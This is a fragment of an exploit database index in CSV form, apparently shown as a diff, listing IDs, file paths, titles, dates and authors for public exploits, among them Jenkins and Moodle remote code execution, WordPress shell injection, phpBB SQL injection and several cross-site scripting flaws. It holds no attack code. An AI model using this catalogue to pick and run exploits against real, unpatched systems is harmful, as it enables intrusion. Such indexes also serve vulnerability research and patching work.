46572,exploits/java/remote/46572.rb,"Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)",2019-03-19,Metasploit,remote,java,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40998,4 +41008,10 @@ id,file,description,date,author,type,platform,port
46549,exploits/php/webapps/46549.txt,"Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities",2019-03-15,"Gionathan Reale",webapps,php,80
46550,exploits/php/webapps/46550.txt,"Laundry CMS - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80
46551,exploits/php/webapps/46551.php,"Moodle 3.4.1 - Remote Code Execution",2019-03-15,"Darryn Ten",webapps,php,80
46555,exploits/php/webapps/46555.txt,"TheCarProject v2 - Multiple SQL Injection",2019-03-18,"Mehmet EMIROGLU",webapps,php,80
46555,exploits/php/webapps/46555.txt,"TheCarProject 2 - Multiple SQL Injection",2019-03-18,"Mehmet EMIROGLU",webapps,php,80
46557,exploits/php/webapps/46557.txt,"Gila CMS 1.9.1 - Cross-Site Scripting",2019-03-19,"Ahmet Ümit BAYRAM",webapps,php,80
46558,exploits/php/webapps/46558.txt,"MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting",2019-03-19,0xB9,webapps,php,80
46559,exploits/php/webapps/46559.txt,"eNdonesia Portal 8.7 - Multiple Vulnerabilities",2019-03-19,"Mehmet EMIROGLU",webapps,php,80
46560,exploits/php/webapps/46560.txt,"Netartmedia Event Portal 2.0 - 'Email' SQL Injection",2019-03-19,"Ahmet Ümit BAYRAM",webapps,php,80
46562,exploits/php/webapps/46562.txt,"Netartmedia PHP Mall 4.1 - SQL Injection",2019-03-19,"Ahmet Ümit BAYRAM",webapps,php,80
46563,exploits/php/webapps/46563.txt,"Netartmedia Real Estate Portal 5.0 - SQL Injection",2019-03-19,"Ahmet Ümit BAYRAM",webapps,php,80

Can't render this file because it is too large.